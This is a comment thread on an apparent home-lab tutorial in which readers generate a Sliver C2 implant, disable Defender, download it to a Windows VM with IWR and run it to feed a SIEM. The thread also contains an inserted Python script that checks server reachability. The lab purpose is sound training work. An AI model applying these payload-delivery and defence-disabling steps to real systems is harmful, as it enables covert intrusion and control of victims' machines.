Hi Eric - Thank you so much for putting this together. I'm a bit stuck on the step executing the C2 payload on the Windows VM. I went back to make sure I was doing everything in order, but I'm getting an error message after executing the command "C:\Users\User\Downloads\NUCLEAR_CHAIR.exe" in the administrative PowerShell - it says "The term 'C:\Users\User\Downloads\NUCLEAR_CHAIR.exe' is not recognized as the name of a cmdlet, function, script file, or operable program." Everything leading up to the step has gone off without a hitch.
Could you please provide some guidance as to what's going on here? I appreciate your time, thanks!
Make sure the payload is actually there by cd'ing to that location and running ls
cd C:\Users\User\Downloads\
ls
Make sure you see it there, if not, re-download it.
It wasn't there! While redownloading I noticed a pop-up in the Windows VM notifying me of a security risk "NUCLEAR_CHAIR.exe"
I clicked the notification and selected "allow on device." I can try to continue from here, but I must've missed something during the steps disabling this on the Windows VM. Should I go back and reconfigure the Windows VM from the first section?
Thank you for your quick response and assistance!
Just to follow up - I went back and re-disabled Microsoft Defender following the steps before and realized I missed one of the steps in the regedit section.
Back on track and everything is working as it should! Thank you!
Hello. I have the same issue: the payload file is on the Linux machine, but not in the Windows VM's "Downloads" folder; only the sensor is saved there. I re-ran through the steps, downloaded a second payload, same thing. I did not receive a pop-up in the Windows VM warning me of a security risk either time. So my payload files are not making it to the Windows VM.
NM. Did not disable Defender on the Windows VM....
Hello Eric, I cannot SSH into my Linux VM from my host machine. Is that a problem that I should be concerned with?
There is no need to SSH; you can proceed with the steps mentioned above.
I am getting cd: /opt/sliver: not a directory for some reason.
You must've missed a step in part 1, specifically the part where we run mkdir -p /opt/sliver
I recommend re-accomplishing the attack system setup steps in part 1.
Thank you! I will try it again.
Not sure if I'm doing something wrong but I can't seem to get sliver to have any sessions appear.
I was able to get the payload on the Windows VM and run the .exe, but when I go to Sliver and run http it says "Job #2 Stopped" and shows "No sessions".
Attempted rebooting the Win VM but still no dice.
Very nice. Every step worked perfectly. Got an error when running
sliver> http
but I just restarted the VM and it worked the second time.
I'm continuously getting the "IWR : Unable to connect to the remote server"
Is there anything suggested to get around this issue? Thanks
Fixed this by deleting the linux VM and restarting from scratch.
Love this outline, thanks so much for the resource and practice field!
Part 2, Step 7 gives me this error:
PS C:\Windows\system32> IWR -Uri http://[Linux_VM_IP]/[payload_name].exe -Outfile C:\Users\User\Downloads\[payload_name].exe
Invoke-WebRequest : Cannot bind parameter 'Uri'. Cannot convert value "http://[Linux_VM_IP]/[payload_name].exe" to
type "System.Uri". Error: "Invalid URI: The hostname could not be parsed."
At line:1 char:10
+ IWR -Uri http://[Linux_VM_IP]/[payload_name].exe -Outfile C:\Users\Us ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (:) [Invoke-WebRequest], ParameterBindingException
+ FullyQualifiedErrorId : CannotConvertArgumentNoMessage,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
Fun stuff! I know this is old news now, but I have had two issues so far.
First, as I am often known to do, I attempted to take the "easy" option of using "Sordum’s Defender Control" to disable Defender. The download was rar'ed and didn't contain an .exe file. Ru roh Raggy! I am thinking it could be malware, but what do I know.
Second, and this is what has stopped me for now, I am unable to get the sliver server to check in on the client once it starts. After executing the payload (love saying that) nothing happens. No joy.
I will attempt to start from the beginning and try again later today. Thanks!
Hi Eric, when trying to run the C2 executable in PowerShell I keep getting the error "Program 'FUZZY_MIDI.exe' failed to run: The specified executable is not a valid application for this OS platform. At line: 1 Char: 1:" Any idea how to troubleshoot? Do you think it might be Defender, or because I downloaded the latest version of Microsoft and perhaps they patched the payload, hmmm... I'll try to figure it out in the meantime.
I had errors downloading the payload because of connection issues. What I did was revert back to the malware staged snapshot and redid the whole process this time successfully downloading the full payload correctly.
Hi Eric, this has been a fun project so far, thanks!
I am not able to run the netstat cmd inside sliver and can't figure out why.
So far, every other cmd works as intended; when I run netstat it just hangs forever with no data. I have to use Ctrl+C to back out.
I am connected to the active session with the use [session ID] cmd
pwd shows C:/windows/system32
I can run netstat from the windows vm command line and get results, ping and dns are both working for internal and external connections
getprivs cmd shows the correct process attributes as enabled (exploit was run as admin)
I'm blanking here, any help is appreciated.
Thanks!
Hi Eric, thanks for this walkthrough.
I am trying to set up or generate the C2 payload as you described (generate --http 192.168.42.128 --save /opt/sliver) for my Ubuntu server via PuTTY (SSH), but I get the error "error:unknown command, try help".
I have tried sudo but nothing is successful.
I have figured it out, Eric. There was a space in the command (just before the generate part), hence why it did not work. A little patience is needed to troubleshoot, I guess.
Hey Eric, I am having a lot of trouble getting the SeDebugPrivilege to show up enabled. The first time I did it, it showed up enabled. The next day it said disabled, so I regenerated the implant and it was enabled. I then ran into errors dumping memory, so I tried to use a new implant, and since then I have not been able to get SeDebugPrivilege to be enabled. Have you ever run into this?
Make sure you are running the implant with admin privileges.
Yeah, that's the odd thing. I have launched the implant with admin in CMD, and I have also launched it in the GUI with admin. I even launched the same implant once and it worked, closed it and launched it again and it didn't, and now none seem to want to work. I'm considering now it's some bug on the Ubuntu side. Thanks for the reply!
Eric, I'm stuck right at the beginning of this step. When I enter "sliver-server", I get nothing in return. I've tried Googling it but haven't had any luck.
Make sure you are working out of /opt/sliver by running this command first: cd /opt/sliver
Thank you for the quick response.
Okay, that got me into /opt/sliver and I ran the sliver-server command like it said and I'm still getting nothing. Are these steps a little out of order or am I just that much of a rookie? I see the cd /opt/sliver command is step 6, but I needed it before step two.
I am getting the sense that something got out of order here... I might try going back through the Linux VM setup instructions.
So I followed the VM instructions accurately, but what I think may be the issue is that whenever I try running the command to download Sliver, I get a lot of "Err" codes (Temporary failure resolving 'archive.ubuntu.com') and "E:" codes (Failed to fetch http://archive.ubuntu.com).
The following command to create a working directory does nothing.
Seems it may be an internet connectivity issue for the VM.
I pinged 8.8.8.8 and it worked fine. It just doesn't work with domain names, it seems.
I started back from the beginning and reinstalled the Linux VM. When I try to ping Google.com, I get this error: (ping: Google.com: temporary failure in name resolution). The last time, I also had this but ended up Googling how to add the Google IP addresses and make the ping work. I didn't realize none of the other domains would be reachable, which seems obvious now. Any idea why the Linux VM is having issues connecting to the internet? I followed everything to a T.
Hello Eric, I am stuck at the "generate a C2 payload using Sliver" step. I am not able to generate a payload even after typing the command: generate --http 10.0.2.15 --save /opt/sliver.
It says command not found sometimes, and sometimes just shows random GitHub directory lines. Do help.
This is a symptom of using a different Ubuntu ISO than the one prescribed. The desktop Ubuntu does not come with git preinstalled. Remedy with apt install git.
IWR -Uri http://10.0.2.15/DARK_SHADE.exe -Outfile C:\Users\User\Downloads\DARK_SHADE.exe
IWR : Unable to connect to the remote server
At line:1 char:1
+ IWR -Uri http://10.0.2.15/DARK_SHADE.exe -Outfile C:\Users\User\Downl ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException
+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
I get this error when I try to download the payload from the Ubuntu VM to the Windows VM. Should I add a firewall rule or something?
Both my Windows and Ubuntu VM have the IP address of 10.0.2.15. They are configured using NAT.
Both VMs cannot have the same IP. Make sure you have two different IPs on the VM subnet.
I am using VirtualBox. Both the VMs are created in NAT mode. When I checked both IPs, they get assigned the same. I went with your blog for NAT. Should I use bridged mode instead?
The NAT only impacts the VMs' traffic leaving the VM subnet; it should not affect the internal IPs assigned within the VM subnet... Sorry, I cannot give much guidance on VirtualBox as I haven't used it in a couple of years.
Okay Eric.
And one more thing, when I install VMware workstation pro, it asks for admin rights to run, is it a problem if I give it that?
If I give admin rights, does it impact my folder creation and document saving rights?
It worked! Thank you so much Eric!!
No doubt I missed something, but I've been working back through the steps and cannot find the cause. Port 22 is open and listening, I can ping the Linux VM, but the MS VM will not connect to the remote server. I continue to get the following:
PS C:\Windows\system32> IWR -Uri http://192.168.44.128/opt/sliver/UNUSUAL_HERON.exe -Outfile C:\Users\User\Downloads\Unusual_Heron.exe
IWR : Unable to connect to the remote server
At line:1 char:1
+ IWR -Uri http://192.168.44.128/opt/sliver/UNUSUAL_HERON.exe -Outfile ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException
+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
Any initial thoughts what I might be overlooking?
In this case, port 22 doesn't play a role. The temporary web server should be listening on port 80. Be sure you've run the python3 -m http.server 80 step properly.
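The distinction Eric draws above (the host answering on port 22 or to ping versus the temporary web server actually listening on port 80) comes up repeatedly in this thread, and the URL in the post above also carries the filesystem path (/opt/sliver/...) inside it, whereas python3 -m http.server serves the directory it was started in at the URL root, so the file is fetched as http://<Linux_VM_IP>/<payload_name>.exe. The following Python script is an added example, not code from the original post or the tutorial: it checks the two layers separately (can a TCP connection be made to the port at all; if so, does an HTTP HEAD for the exact path return 200 or 404) so the failure can be attributed to routing/IP, to no listener, or to a wrong URL path. The loopback address, the free port and the file name SAMPLE_PAYLOAD.exe are constructed for the demo; the served file is an empty placeholder.

```python
"""Two-layer reachability check for the temporary payload web server.

Added example (not from the original post or the tutorial). Separates
"the host is up and something is listening" from "an HTTP server answers
on the port and path the download actually uses".
"""
import http.client
import http.server
import os
import socket
import socketserver
import tempfile
import threading
from functools import partial


def tcp_probe(host: str, port: int, timeout: float = 2.0) -> str:
    """Return 'open', 'refused' or 'unreachable' for host:port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"
    except ConnectionRefusedError:
        return "refused"        # host answered; nothing is listening on that port
    except OSError:
        return "unreachable"    # no answer at all: wrong IP, routing or a firewall


def http_probe(host: str, port: int, path: str, timeout: float = 2.0) -> int:
    """Issue a HEAD request for `path` and return the HTTP status code."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("HEAD", path)
        return conn.getresponse().status
    finally:
        conn.close()


def diagnose(host: str, port: int, path: str) -> str:
    """One verdict string: 'tcp:<state>' if no connection, else 'http:<code>'."""
    state = tcp_probe(host, port)
    if state != "open":
        return f"tcp:{state}"
    return f"http:{http_probe(host, port, path)}"


class _QuietHandler(http.server.SimpleHTTPRequestHandler):
    """SimpleHTTPRequestHandler without per-request logging on stderr."""

    def log_message(self, *_):
        pass


def serve_directory(directory: str):
    """Loopback equivalent of `python3 -m http.server` on a free port."""
    handler = partial(_QuietHandler, directory=directory)
    srv = socketserver.TCPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def free_closed_port() -> int:
    """Find a loopback port that nothing is listening on (bind, read, close)."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo():
    """Serve a constructed placeholder file and run the three diagnostic cases."""
    with tempfile.TemporaryDirectory() as d:
        # Constructed stand-in for the generated payload; the name is made up.
        open(os.path.join(d, "SAMPLE_PAYLOAD.exe"), "wb").close()
        srv, port = serve_directory(d)
        try:
            good_path = diagnose("127.0.0.1", port, "/SAMPLE_PAYLOAD.exe")
            # Filesystem path pasted into the URL: the server maps it under
            # the served directory, where it does not exist.
            bad_path = diagnose("127.0.0.1", port, "/opt/sliver/SAMPLE_PAYLOAD.exe")
        finally:
            srv.shutdown()
            srv.server_close()
    no_listener = diagnose("127.0.0.1", free_closed_port(), "/SAMPLE_PAYLOAD.exe")
    return good_path, bad_path, no_listener


if __name__ == "__main__":
    for label, verdict in zip(("correct URL", "path in URL", "no listener"), demo()):
        print(f"{label:>12}: {verdict}")
```

Run against the real lab by calling diagnose() with the Linux VM's IP, port 80 and the exact path used in the IWR command: "tcp:unreachable" points at the IP or VM networking, "tcp:refused" means the http.server step was not run (or was started on another port), and "http:404" means the server is up but the URL path does not match where the file sits relative to the directory the server was started in.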
Got it! Thanks. I've been experiencing my VMs running super slow. So I did some testing, and I'm using about 90% of the 16GB of RAM that I have on my laptop lol. I might have to upgrade, or maybe I can get my hands on a Windows PC or laptop.
My PC has 16GB and was having the same experience while running the Win VM. It looks like that VM comes preconfigured with 8GB Memory and 4 Processors. I bumped the processors down to 2 instead of 4 and had a much better experience. Hope this is helpful!
I'll add a comment in the post, thanks for pointing that out.
Glad to help. Also, thanks for putting this out there! It's my first time messing with a SIEM, much less standing one up in a virtualized environment. This has been really helpful to get some hands-on experience!